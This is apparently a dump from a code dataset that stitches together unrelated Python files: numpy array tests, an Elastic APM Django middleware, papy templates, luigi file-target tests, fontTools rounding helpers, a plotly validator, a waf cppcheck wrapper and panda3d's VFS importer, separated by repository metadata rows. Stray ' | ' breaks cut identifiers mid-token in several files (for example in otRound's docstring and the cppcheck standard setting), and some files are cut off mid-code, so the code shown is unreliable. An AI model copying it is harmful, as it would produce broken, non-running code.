assert_array_less, runstring, dec, SkipTest, temppath
)
# Need to test an object that does not fully implement math interface
from datetime import timedelta
if sys.version_info[:2] > (3, 2):
# In Python 3.3 the representation of empty shape, strides and sub-offsets
# is an empty tuple instead of None.
# http://docs.python.org/dev/whatsnew/3.3.html#api-changes
EMPTY = ()
else:
EMPTY = None
class TestFlags(TestCase):
def setUp(self):
self.a = np.arange(10)
def test_writeable(self):
mydict = locals()
self.a.flags.writeable = False
self.assertRaises(ValueError, runstring, 'self.a[0] = 3', mydict)
self.assertRaises(ValueError, runstring, 'self.a[0:1].itemset(3)', mydict)
self.a.flags.writeable = True
self.a[0] = 5
self.a[0] = 0
def test_otherflags(self):
assert_equal(self.a.flags.carray, True)
assert_equal(self.a.flags.farray, False)
assert_equal(self.a.flags.behaved, True)
assert_equal(self.a.flags.fnc, False)
assert_equal(self.a.flags.forc, True)
assert_equal(self.a.flags.owndata, True)
assert_equal(self.a.flags.writeable, True)
assert_equal(self.a.flags.aligned, True)
assert_equal(self.a.flags.updateifcopy, False)
def test_string_align(self):
a = np.zeros(4, dtype=np.dtype('|S4'))
assert_(a.flags.aligned)
# sizes that are not a power of two are accessed byte-wise and thus considered aligned
a = np.zeros(5, dtype=np.dtype('|S4'))
assert_(a.flags.aligned)
def test_void_align(self):
a = np.zeros(4, dtype=np.dtype([("a", "i4"), ("b", "i4")]))
assert_(a.flags.aligned)
class TestHash(TestCase):
# see #3793
def test_int(self):
for st, ut, s in [(np.int8, np.uint8, 8),
(np.int16, np.uint16, 16),
(np.int32, np.uint32, 32),
(np.int64, np.uint64, 64)]:
for i in range(1, s):
assert_equal(hash(st(-2**i)), hash(-2**i),
err_msg="%r: -2**%d" % (st, i))
assert_equal(hash(st(2**(i - 1))), hash(2**(i - 1)),
err_msg="%r: 2**%d" % (st, i - 1))
assert_equal(hash(st(2**i - 1)), hash(2**i - 1),
err_msg="%r: 2**%d - 1" % (st, i))
i = max(i - 1, 1)
assert_equal(hash(ut(2**(i - 1))), hash(2**(i - 1)),
err_msg="%r: 2**%d" % (ut, i - 1))
assert_equal(hash(ut(2**i - 1)), hash(2**i - 1),
err_msg="%r: 2**%d - 1" % (ut, i))
class TestAttributes(TestCase):
def setUp(self):
self.one = np.arange(10)
self.two = np.arange(20).reshape(4, 5)
self.three = np.arange(60, dtype=np.float64).reshape(2, 5, 6)
def test_attributes(self):
assert_equal(self.one.shape, (10,))
assert_equal(self.two.shape, (4, 5))
assert_equal(self.three.shape, (2, 5, 6))
self.three.shape = (10, 3, 2)
assert_equal(self.three.shape, (10, 3, 2))
self.three.shape = (2, 5, 6)
assert_equal(self.one.strides, (self.one.itemsize,))
num = self.two.itemsize
assert_equal(self.two.strides, (5*num, num))
num = self.three.itemsize
assert_equal(self.three.strides, (30*num, 6*num, num))
assert_equal(self.one.ndim, 1)
assert_equal(self.two.ndim, 2)
assert_equal(self.three.ndim, 3)
num = self.two.itemsize
assert_equal(self.two.size, 20)
assert_equal(self.two.nbytes, 20*num)
assert_equal(self.two.itemsize, self.two.dtype.itemsize)
assert_equal(self.two.base, np.arange(20))
def test_dtypeattr(self):
assert_equal(self.one.dtype, np.dtype(np.int_))
assert_equal(self.three.dtype, np.dtype(np.float_))
assert_equal(self.one.dtype.char, 'l')
assert_equal(self.three.dtype.char, 'd')
self.assertTrue(self.three.dtype.str[0] in '<>')
assert_equal(self.one.dtype.str[1], 'i')
assert_equal(self.three.dtype.str[1], 'f')
def test_int_subclassing(self):
# Regression test for https://github.com/numpy/numpy/pull/3526
numpy_int = np.int_(0)
if sys.version_info[0] >= 3:
# On Py3k int_ should not inherit from int, because it's not
# fixed-width anymore
assert_equal(isinstance(numpy_int, int), False)
else:
# Otherwise, it should inherit from int...
assert_equal(isinstance(numpy_int, int), True)
# ... and fast-path checks on C-API level should also work
from numpy.core.multiarray_tests import test_int_subclass
assert_equal(test_int_subclass(numpy_int), True)
def test_stridesattr(self):
x = self.one
def make_array(size, offset, strides):
return np.ndarray(size, buffer=x, dtype=int,
offset=offset*x.itemsize,
strides=strides*x.itemsize)
assert_equal(make_array(4, 4, -1), np.array([4, 3, 2, 1]))
self.assertRaises(ValueError, make_array, 4, 4, -2)
self.assertRaises(ValueError, make_array, 4, 2, -1)
self.assertRaises(ValueError, make_array, 8, 3, 1)
assert_equal(make_array(8, 3, 0), np.array([3]*8))
# Check behavior reported in gh-2503:
self.assertRaises(ValueError, make_array, (2, 3), 5, np.array([-2, -3]))
make_array(0, 0, 10)
def test_set_stridesattr(self):
x = self.one
def make_array(size, offset, strides):
try:
r = np.ndarray([size], dtype=int, buffer=x,
offset=offset*x.itemsize)
except:
raise RuntimeError(getexception())
r.strides = strides = strides*x.itemsize
return r
assert_equal(make_array(4, 4, -1), np.array([4, 3, 2, 1]))
assert_equal(make_array(7, 3, 1), np.array([3, 4, 5, 6, 7, 8, 9]))
self.assertRaises(ValueError, make_array, 4, 4, -2)
self.assertRaises(ValueError, make_array, 4, 2, -1)
self.assertRaises(RuntimeError, make_array, 8, 3, 1)
# Check that the true extent of the array is used.
# Test relies on as_strided base not exposing a buffer.
x = np.lib.stride_tricks.as_strided(np.arange(1), (10, 10), (0, 0))
def set_strides(arr, strides):
arr.strides = strides
self.assertRaises(ValueError, set_strides, x, (10*x.itemsize, x.itemsize))
# Test for offset calculations:
x = np.lib.stride_tricks.as_strided(np.arange(10, dtype=np.int8)[-1],
shape=(10,), strides=(-1,))
self.assertRaises(ValueError, set_strides, x[::-1], -1)
a = x[::-1]
a.strides = 1
a[::2].strides = 2
def test_fill(self):
for t in "?bhilqpBHILQPfdgFDGO":
x = np.empty((3, 2, 1), t)
y = np.empty((3, 2, 1), t)
x.fill(1)
y[...] = 1
assert_equal(x, y)
def test_fill_max_uint64(self):
x |
beniwohli/apm-agent-python | elasticapm/contrib/django/middleware/wsgi.py | Python | bsd-3-clause | 2,302 | 0.001738 | # BSD 3-Clause License
#
# Copyright (c) 2012, the Sentry Team, see AUTHORS for more details
# Copyright (c) 2019, Elasticsearch BV
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from django.apps import apps
from elasticapm.contrib.django.client import get_client
from elasticapm.middleware import ElasticAPM as ElasticAPMBase
class ElasticAPM(ElasticAPMBase):
"""
Identical to the default WSGI middleware except that
the client comes dynamically via ``get_client
>>> from elasticapm.contrib.django.middleware.wsgi import ElasticAPM
>>> application = ElasticAPM(application)
"""
def __init__(self, application):
self.application = application
@property
def client(self):
try:
app = apps.get_app_config("elasticapm.contrib.django")
return app.client
except LookupError:
return get_client()
|
mcieslik-mctp/papy | src/papy/util/codefile.py | Python | mit | 1,160 | 0.003448 | """
:mod:`papy.util.codefile`
=========================
Provides template strings for saving **PaPy** pipelines directly as Python
source code.
"""
# imap call signature
I_SIG = ' %s = NuMap(worker_type="%s", worker_num=%s, stride=%s, buffer=%s, ' + \
'ordered =%s, skip =%s, name ="%s")\n'
# piper call signature
P_SIG = ' %s = Piper(%s, parallel=%s, consume=%s, produce=%s, spawn=%s, ' + \
'timeout=%s, branch=%s, debug=%s, name="%s", ' + \
'track=%s)\n'
# worker call signature
W_SIG = 'Worker((%s,), %s, %s)'
# list signature
L_SIG = '(%s, %s)'
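# Illustrative rendering of I_SIG (the argument values below are invented
# for the example; real values come from the pipeline being saved):
#
#   I_SIG % ('imap_0', 'process', 4, 1, None, True, False, 'imap_0')
#
# yields the line:
#
#   imap_0 = NuMap(worker_type="process", worker_num=4, stride=1, buffer=None, ordered =True, skip =False, name ="imap_0")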
# papy pipeline source-file layout
P_LAY = \
'from papy import *' + '\n' + \
'from numap import NuMap' + '\n\n' + \
'%s' + '\n' + \
'%s' + '\n\n' + \
'def pipeline():' + '\n' + \
'%s' + '\n\n' + \
'%s' + '\n\n' + \
' ' + 'pipers = %s' + '\n' + \
' ' + 'xtras = %s' + '\n' + \
' ' + 'pipes = %s' + '\n' + \
' ' + 'return (pipers, xtras, pipes)' + '\n\n' + \
'if __name__ == "__main__":' + '\n' + \
' ' + 'pipeline()' + '\n' + \
'' + '\n'
|
riga/luigi | test/local_target_test.py | Python | apache-2.0 | 11,097 | 0.000361 | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import bz2
import gzip
import os
import random
import shutil
import sys
from helpers import unittest
import mock
import luigi.format
from luigi import LocalTarget
from luigi.local_target import LocalFileSystem
from luigi.target import FileAlreadyExists, MissingParentDirectory
from target_test import FileSystemTargetTestMixin
import itertools
import io
from errno import EEXIST, EXDEV
class LocalTargetTest(unittest.TestCase, FileSystemTargetTestMixin):
PATH_PREFIX = '/tmp/test.txt'
def setUp(self):
self.path = self.PATH_PREFIX + '-' + str(self.id())
self.copy = self.PATH_PREFIX + '-copy-' + str(self.id())
if os.path.exists(self.path):
os.remove(self.path)
if os.path.exists(self.copy):
os.remove(self.copy)
def tearDown(self):
if os.path.exists(self.path):
os.remove(self.path)
if os.path.exists(self.copy):
os.remove(self.copy)
def create_target(self, format=None):
return LocalTarget(self.path, format=format)
def assertCleanUp(self, tmp_path=''):
self.assertFalse(os.path.exists(tmp_path))
def test_exists(self):
t = self.create_target()
p = t.open('w')
self.assertEqual(t.exists(), os.path.exists(self.path))
p.close()
self.assertEqual(t.exists(), os.path.exists(self.path))
@unittest.skipIf(tuple(sys.version_info) < (3, 4), 'only for Python>=3.4')
def test_pathlib(self):
"""Test work with pathlib.Path"""
import pathlib
path = pathlib.Path(self.path)
self.assertFalse(path.exists())
target = LocalTarget(path)
self.assertFalse(target.exists())
with path.open('w') as stream:
stream.write('test me')
self.assertTrue(target.exists())
def test_gzip_with_module(self):
t = LocalTarget(self.path, luigi.format.Gzip)
p = t.open('w')
test_data = b'test'
p.write(test_data)
print(self.path)
self.assertFalse(os.path.exists(self.path))
p.close()
self.assertTrue(os.path.exists(self.path))
# Using gzip module as validation
f = gzip.open(self.path, 'r')
self.assertTrue(test_data == f.read())
f.close()
# Verifying our own gzip reader
f = LocalTarget(self.path, luigi.format.Gzip).open('r')
self.assertTrue(test_data == f.read())
f.close()
def test_bzip2(self):
t = LocalTarget(self.path, luigi.format.Bzip2)
p = t.open('w')
test_data = b'test'
p.write(test_data)
print(self.path)
self.assertFalse(os.path.exists(self.path))
p.close()
self.assertTrue(os.path.exists(self.path))
# Using bzip module as validation
f = bz2.BZ2File(self.path, 'r')
self.assertTrue(test_data == f.read())
f.close()
# Verifying our own bzip2 reader
f = LocalTarget(self.path, luigi.format.Bzip2).open('r')
self.assertTrue(test_data == f.read())
f.close()
def test_copy(self):
t = LocalTarget(self.path)
f = t.open('w')
test_data = 'test'
f.write(test_data)
f.close()
self.assertTrue(os.path.exists(self.path))
self.assertFalse(os.path.exists(self.copy))
t.copy(self.copy)
self.assertTrue(os.path.exists(self.path))
self.assertTrue(os.path.exists(self.copy))
self.assertEqual(t.open('r').read(), LocalTarget(self.copy).open('r').read())
def test_move(self):
t = LocalTarget(self.path)
f = t.open('w')
test_data = 'test'
f.write(test_data)
f.close()
self.assertTrue(os.path.exists(self.path))
self.assertFalse(os.path.exists(self.copy))
t.move(self.copy)
self.assertFalse(os.path.exists(self.path))
self.assertTrue(os.path.exists(self.copy))
def test_move_across_filesystems(self):
t = LocalTarget(self.path)
with t.open('w') as f:
f.write('test_data')
def rename_across_filesystems(src, dst):
err = OSError()
err.errno = EXDEV
raise err
real_rename = os.rename
def mockrename(src, dst):
if '-across-fs' in src:
real_rename(src, dst)
else:
rename_across_filesystems(src, dst)
copy = '%s-across-fs' % self.copy
with mock.patch('os.rename', mockrename):
t.move(copy)
self.assertFalse(os.path.exists(self.path))
self.assertTrue(os.path.exists(copy))
self.assertEqual('test_data', LocalTarget(copy).open('r').read())
def test_format_chain(self):
UTF8WIN = luigi.format.TextFormat(encoding='utf8', newline='\r\n')
t = LocalTarget(self.path, UTF8WIN >> luigi.format.Gzip)
a = u'我é\nçф'
with t.open('w') as f:
f.write(a)
f = gzip.open(self.path, 'rb')
b = f.read()
f.close()
self.assertEqual(b'\xe6\x88\x91\xc3\xa9\r\n\xc3\xa7\xd1\x84', b)
def test_format_chain_reverse(self):
t = LocalTarget(self.path, luigi.format.UTF8 >> luigi.format.Gzip)
f = gzip.open(self.path, 'wb')
f.write(b'\xe6\x88\x91\xc3\xa9\r\n\xc3\xa7\xd1\x84')
f.close()
with t.open('r') as f:
b = f.read()
self.assertEqual(u'我é\nçф', b)
@mock.patch('os.linesep', '\r\n')
def test_format_newline(self):
t = LocalTarget(self.path, luigi.format.SysNewLine)
with t.open('w') as f:
f.write(b'a\rb\nc\r\nd')
with t.open('r') as f:
b = f.read()
with open(self.path, 'rb') as f:
c = f.read()
self.assertEqual(b'a\nb\nc\nd', b)
self.assertEqual(b'a\r\nb\r\nc\r\nd', c)
def theoretical_io_modes(
self,
rwax='rwax',
bt=['', 'b', 't'],
plus=['', '+']):
p = itertools.product(rwax, plus, bt)
return {''.join(c) for c in list(
itertools.chain.from_iterable(
[itertools.permutations(m) for m in p]))}
def valid_io_modes(self, *a, **kw):
modes = set()
t = LocalTarget(is_tmp=True)
t.open('w').close()
for mode in self.theoretical_io_modes(*a, **kw):
try:
io.FileIO(t.path, mode).close()
except ValueError:
pass
except IOError as err:
if err.errno == EEXIST:
modes.add(mode)
else:
raise
else:
modes.add(mode)
return modes
def valid_write_io_modes_for_luigi(self):
return self.valid_io_modes('w', plus=[''])
def valid_read_io_modes_for_luigi(self):
return self.valid_io_modes('r', plus=[''])
def invalid_io_modes_for_luigi(self):
return self.valid_io_modes().difference(
self.valid_write_io_modes_for_luigi(),
self.valid_read_io_modes_for_luigi())
def test_open_modes(self):
t = LocalTarget(is_tmp=True)
print('Valid write mode:', end=' ')
for mode in self.valid_write_io_modes_for_luigi():
print(mode, end=' ')
p = t.open(mode)
p.close()
print()
print('Valid read mode:', end=' ')
for mode in self.valid_read_io_modes_for_luigi():
print(mode, end=' ')
p = t.open(mode)
p.close()
|
acsone/mozaik | mozaik_person/tests/__init__.py | Python | agpl-3.0 | 1,096 | 0 | # -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of mozaik_person, an Odoo module.
#
# Copyright (c) 2015 ACSONE SA/NV (<http://acsone.eu>)
#
# mozaik_person is free software:
# you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public License
# as published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
#
# mozaik_person is distributed in the hope that it will
# be useful but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the
# GNU Affero General Public License
# along with mozaik_person.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import test_res_partner
from . import test_create_user_from_partner
|
google/material-design-icons | update/venv/lib/python3.9/site-packages/fontTools/misc/roundTools.py | Python | apache-2.0 | 1,585 | 0.018297 | """
Various round-to-integer helpers.
"""
import math
import functools
import logging
log = logging.getLogger(__name__)
__all__ = [
"noRound",
"otRound",
"maybeRound",
"roundFunc",
]
def noRound(value):
return value
def otRound(value):
"""Round float value to neares | t integer towards ``+Infinity``.
The OpenType spec (in the section on `"normalization" of OpenType Font Variations <https://docs.microsoft.com/en-us/typography/opentype/spec/otvaroverview#coordinate-scales-and-normalization>`_)
defines the required method for converting floating point values to
fixed-point. In particular it specifies the following rounding strategy:
for fractional values of 0.5 and higher, take the next higher integer;
for other fractional values, truncate.
This function rounds the floating-point value according to this strategy
in preparation for conversion to fixed-point.
Args:
value (float): The input floating-point value.
Returns
float: The rounded value.
"""
# See this thread for how we ended up with this implementation:
# https://github.com/fonttools/fonttools/issues/1248#issuecomment-383198166
return int(math.floor(value + 0.5))
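# Illustrative values (assumed examples to clarify the strategy described
# in the docstring; they are not taken from the OpenType spec):
#   otRound(0.5)  == 1    # int(math.floor(0.5 + 0.5))  == 1
#   otRound(-0.5) == 0    # int(math.floor(-0.5 + 0.5)) == 0
#   otRound(1.4)  == 1    # fractions below .5 truncate
#   otRound(-1.5) == -1   # int(math.floor(-1.5 + 0.5)) == -1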
def maybeRound(v, tolerance, round=otRound):
rounded = round(v)
return rounded if abs(rounded - v) <= tolerance else v
def roundFunc(tolerance, round=otRound):
if tolerance < 0:
raise ValueError("Rounding tolerance must be positive")
if tolerance == 0:
return noRound
if tolerance >= .5:
return round
return functools.partial(maybeRound, tolerance=tolerance, round=round)
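# Sketch of roundFunc behaviour for a few tolerances (assumed examples,
# not taken from the library's documentation):
#   roundFunc(0)(3.6)    -> 3.6   # noRound: value passed through unchanged
#   roundFunc(0.5)(3.6)  -> 4     # tolerance >= .5: plain otRound
#   roundFunc(0.1)(3.95) -> 4     # |4 - 3.95| <= 0.1, rounded value kept
#   roundFunc(0.1)(3.6)  -> 3.6   # |4 - 3.6| > 0.1, original value kept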
|
plotly/plotly.py | packages/python/plotly/plotly/validators/layout/slider/_minorticklen.py | Python | mit | 474 | 0 | import _plotly_utils. | basevalidators
class MinorticklenValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="minorticklen", parent_name="layout.slider", **kwargs
):
super(MinorticklenValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "arraydraw"),
min=kwargs.pop("min", 0),
**kwargs
)
|
michelm/beehive | waftools/cppcheck.py | Python | mit | 16,204 | 0.02845 | #! /usr/bin/env python
# -*- encoding: utf-8 -*-
# Michel Mooij, michel.mooij7@gmail.com
"""
Tool Description
================
This module provides a waf wrapper (i.e. waftool) around the C/C++ source code
checking tool 'cppcheck'.
See http://cppcheck.sourceforge.net/ for more information on the cppcheck tool
itself.
Note that many Linux distributions already provide a ready-to-install version
of cppcheck. On Fedora, for instance, it can be installed using yum:
'sudo yum install cppcheck'
Usage
=====
In order to use this waftool simply add it to the 'options' and 'configure'
functions of your main waf script as shown in the example below:
def options(opt):
opt.load('cppcheck', tooldir='./waftools')
def configure(conf):
conf.load('cppcheck')
Note that example shown above assumes that the cppcheck waftool is located in
the sub directory named 'waftools'.
When configured as shown in the example above, cppcheck will automatically
perform a source code analysis on all C/C++ build tasks that have been
defined in your waf build system.
The example shown below for a C program will be used as input for cppcheck when
building the task.
def build(bld):
bld.program(name='foo', src='foobar.c')
The result of the source code analysis will be stored both as xml and html
files in the build location for the task. Should any error be detected by
cppcheck, the build will be aborted and a link to the html report will be shown.
When needed, source code checking by cppcheck can be disabled per task, or per
detected error or warning for a particular task. It can also be disabled for
all tasks.
In order to exclude a task from source code checking add the skip option to the
task as shown below:
def build(bld):
bld.program(
name='foo',
src='foobar.c'
cppcheck_skip=True
)
When needed, problems detected by cppcheck may be suppressed using a file
containing a list of suppression rules. The relative or absolute path to this
file can be added to the build task as shown in the example below:
bld.program(
name='bar',
src='foobar.c',
cppcheck_suppress='bar.suppress'
)
A cppcheck suppress file should contain one suppress rule per line. Each of
these rules will be passed as an '--suppress=<rule>' argument to cppcheck.
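For instance, a suppress file could contain rules like the ones below, using
cppcheck's '<error-id>[:<filename>[:<line>]]' rule syntax (the ids and paths
shown are purely illustrative):
    unusedFunction
    unreadVariable:src/foobar.c
    nullPointer:src/foobar.c:23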
Dependencies
================
This waftool depends on the Python pygments module; it is used for source code
syntax highlighting when creating the html reports. See http://pygments.org/ for
more information on this package.
Remarks
================
The generation of the html report is originally based on the cppcheck-htmlreport.py
script that comes shipped with the cppcheck tool.
"""
import os
import sys
import xml.etree.ElementTree as ElementTree
from waflib import Task, TaskGen, Logs, Context
PYGMENTS_EXC_MSG = '''
The required module 'pygments' could not be found. Please install it using your
platform package manager (e.g. apt-get or yum), using 'pip' or 'easy_install',
see 'http://pygments.org/download/' for installation instructions.
'''
try:
import pygments
from pygments import formatters, lexers
except ImportError, e:
Logs.warn(PYGMENTS_EXC_MSG)
raise e
def options(opt):
opt.add_option('--cppcheck-skip', dest='cppcheck_skip',
default=False, action='store_true',
help='do not check C/C++ sources (default=False)')
opt.add_option('--cppcheck-err-resume', dest='cppcheck_err_resume',
default=False, action='store_true',
help='continue in case of errors (default=False)')
opt.add_option('--cppcheck-bin-enable', dest='cppcheck_bin_enable',
default='warning,performance,portability,style,unusedFunction', action='store',
help="cppcheck option '--enable=' for binaries (default=warning,performance,portability,style,unusedFunction)")
opt.add_option('--cppcheck-lib-enable', dest='cppcheck_lib_enable',
default='warning,performance,portability,style', action='store',
help="cppcheck option '--enable=' for libraries (default=warning,performance,portability,style)")
opt.add_option('--cppcheck-std-c', dest='cppcheck_std_c',
default='c99', action='store',
help='cppcheck standard to use when checking C (default=c99)')
opt.add_option('--cppcheck-std-cxx', dest='cppcheck_std_cxx',
default='c++03', action='store',
help='cppcheck standard to use when checking C++ (default=c++03)')
opt.add_option('--cppcheck-check-config', dest='cppcheck_check_config',
default=False, action='store_true',
help='forced check for missing buildin include files, e.g. stdio.h (default=False)')
opt.add_option('--cppcheck-max-configs', dest='cppcheck_max_configs',
default='20', action='store',
help='maximum preprocessor (--max-configs) define iterations (default=20)')
def configure(conf):
if conf.options.cppcheck_skip:
conf.env.CPPCHECK_SKIP = [True]
conf.env.CPPCHECK_STD_C = conf.options.cppcheck_std_c
conf.env.CPPCHECK_STD_CXX = conf.options.cppcheck_std_cxx
conf.env.CPPCHECK_MAX_CONFIGS = conf.options.cppcheck_max_configs
conf.env.CPPCHECK_BIN_ENABLE = conf.options.cppcheck_bin_enable
conf.env.CPPCHECK_LIB_ENABLE = conf.options.cppcheck_lib_enable
conf.find_program('cppcheck', var='CPPCHECK')
@TaskGen.feature('c')
@TaskGen.feature('cxx')
def cppcheck_execute(self):
if len(self.env.CPPCHECK_SKIP) or self.bld.options.cppcheck_skip:
return
if getattr(self, 'cppcheck_skip', False):
return
task = self.create_task('cppcheck')
task.cmd = _tgen_create_cmd(self)
task.fatal = []
if not self.bld.options.cppcheck_err_resume:
task.fatal.append('error')
def _tgen_create_cmd(self):
features = getattr(self, 'features', [])
std_c = self.env.CPPCHECK_STD | _C
std_cxx = self.env.CPPCHECK_STD_CXX
max_configs = self.env.CPPCHECK_MAX_CONFIGS
bin_enable = self.env.CPPCHECK_BIN_ENABLE
lib_enable = self.env.CPPCHECK_LIB_ENABLE
cmd = '%s' % self.env.CPPCHECK
args = ['--inconclusive','--report-progress','--verbose','--xml','--xml-version=2']
args.append('--max-configs=%s' % max_configs)
if 'cxx' in features:
args.append('--language=c++')
args.append('--std=%s' | % std_cxx)
else:
args.append('--language=c')
args.append('--std=%s' % std_c)
if self.bld.options.cppcheck_check_config:
args.append('--check-config')
if set(['cprogram','cxxprogram']) & set(features):
args.append('--enable=%s' % bin_enable)
else:
args.append('--enable=%s' % lib_enable)
for src in self.to_list(getattr(self, 'source', [])):
args.append('%r' % src)
for inc in self.to_incnodes(self.to_list(getattr(self, 'includes', []))):
args.append('-I%r' % inc)
for inc in self.to_incnodes(self.to_list(self.env.INCLUDES)):
args.append('-I%r' % inc)
return '%s %s' % (cmd, ' '.join(args))
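# Illustrative example: for a task generator with the 'cxxprogram' feature and
# default options, the returned command resembles:
#   cppcheck --inconclusive --report-progress --verbose --xml --xml-version=2
#   --max-configs=20 --language=c++ --std=c++03
#   --enable=warning,performance,portability,style,unusedFunction
#   'main.cpp' -I'include'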
class cppcheck(Task.Task):
quiet = True
def run(self):
stderr = self.generator.bld.cmd_and_log(self.cmd, quiet=Context.STDERR, output=Context.STDERR)
self._save_xml_report(stderr)
defects = self._get_defects(stderr)
index = self._create_html_report(defects)
self._errors_evaluate(defects, index)
return 0
def _save_xml_report(self, s):
'''use cppcheck xml result string, add the command string used to invoke cppcheck
and save as xml file.
'''
header = '%s\n' % s.split('\n')[0]
root = ElementTree.fromstring(s)
cmd = ElementTree.SubElement(root.find('cppcheck'), 'cmd')
cmd.text = str(self.cmd)
body = ElementTree.tostring(root)
node = self.generator.path.get_bld().find_or_declare('cppcheck.xml')
node.write(header + body)
def _get_defects(self, xml_string):
'''evaluate the xml string returned by cppcheck (on stderr) and use it to create
a list of defects.
'''
defects = []
for error in ElementTree.fromstring(xml_string).iter('error'):
defect = {}
defect['id'] = error.get('id')
defect['severity'] = error.get('severity')
defect['msg'] = str(error.get('msg')).replace('<', '&lt;')
defect['verbose'] = error.get('verbose')
for location in error.findall('location'):
defect['file'] = location.get('file')
defect['line'] = str(int(location.get('line')) - 1)
defects.append(defect)
return defects
def _create_html_report(self, defects):
files, css_style_defs = self._create_html_files(defects)
index = sel |
tobspr/panda3d | direct/src/showbase/VFSImporter.py | Python | bsd-3-clause | 19,654 | 0.002646 | __all__ = ['register', 'sharedPackages',
'reloadSharedPackage', 'reloadSharedPackages']
from panda3d.core import Filename, VirtualFileSystem, VirtualFileMountSystem, OFileStream, copyStream
from direct.stdpy.file import open
import sys
import marshal
import imp
import types
# The sharedPackages dictionary lists all of the "shared packages",
# special Python packages that automatically span multiple directories
# via magic in the VFSImporter. You can make a package "shared"
# simply by adding its name into this dictionary (and then calling
# reloadSharedPackages() if it's already been imported).
# When a package name is in this dictionary at import time, *all*
# instances of the package are located along sys.path, and merged into
# a single Python module with a __path__ setting that represents the
# union. Thus, you can have a direct.showbase.foo in your own
# application, and loading it won't shadow the system
# direct.showbase.ShowBase which is in a different directory on disk.
sharedPackages = {}
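# Illustrative example (hypothetical package name): to make 'myapp.plugins'
# span every copy found along sys.path, register it and reload it if it was
# already imported:
#
#   from direct.showbase import VFSImporter
#   VFSImporter.sharedPackages['myapp.plugins'] = True
#   VFSImporter.reloadSharedPackages()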
vfs = VirtualFileSystem.getGlobalPtr()
compiledExtensions = [ 'pyc', 'pyo' ]
if not __debug__:
# In optimized mode, we prefer loading .pyo files over .pyc files.
# We implement that by reversing the extension names.
compiledExtensions = [ 'pyo', 'pyc' ]
class VFSImporter:
""" This class serves as a Python importer to support loading
Python .py and .pyc/.pyo files from Panda's Virtual File System,
which allows loading Python source files from mounted .mf files
(among other places). """
def __init__(self, path):
if isinstance(path, Filename):
self.dir_path = Filename(path)
else:
self.dir_path = Filename.fromOsSpecific(path)
def find_module(self, fullname, path = None):
if path is None:
dir_path = self.dir_path
else:
dir_path = path
#print >>sys.stderr, "find_module(%s), dir_path = %s" % (fullname, dir_path)
basename = fullname.split('.')[-1]
path = Filename(dir_path, basename)
# First, look for Python files.
filename = Filename(path)
filename.setExtension('py')
vfile = vfs.getFile(filename, True)
if vfile:
return VFSLoader(dir_path, vfile, filename,
desc=('.py', 'U', imp.PY_SOURCE))
# If there's no .py file, but there's a .pyc file, load that
# anyway.
for ext in compiledExtensions:
filename = Filename(path)
filename.setExtension(ext)
vfile = vfs.getFile(filename, True)
if vfile:
return VFSLoader(dir_path, vfile, filename,
desc=('.'+ext, 'rb', imp.PY_COMPILED))
# Look for a C/C++ extension module.
for desc in imp.get_suffixes():
if desc[2] != imp.C_EXTENSION:
continue
filename = Filename(path + desc[0])
vfile = vfs.getFile(filename, True)
if vfile:
return VFSLoader(dir_path, vfile, filename, desc=desc)
# Finally, consider a package, i.e. a directory containing
# __init__.py.
filename = Filename(path, '__init__.py')
vfile = vfs.getFile(filename, True)
if vfile:
return VFSLoader(dir_path, vfile, filename, packagePath=path,
desc=('.py', 'U', imp.PY_SOURCE))
for ext in compiledExtensions:
filename = Filename(path, '__init__.' + ext)
vfile = vfs.getFile(filename, True)
if vfile:
return VFSLoader(dir_path, vfile, filename, packagePath=path,
desc=('.'+ext, 'rb', imp.PY_COMPILED))
#print >>sys.stderr, "not found."
return None
class VFSLoader:
""" The second part of VFSImporter, this is created for a
particular .py file or directory. """
def __init__(self, dir_path, vfile, filename, desc, packagePath=None):
self.dir_path = dir_path
self.timestamp = None
if vfile:
| self.timestamp = vfile.getTimestamp()
self.fil | ename = filename
self.desc = desc
self.packagePath = packagePath
def load_module(self, fullname, loadingShared = False):
#print >>sys.stderr, "load_module(%s), dir_path = %s, filename = %s" % (fullname, self.dir_path, self.filename)
if self.desc[2] == imp.PY_FROZEN:
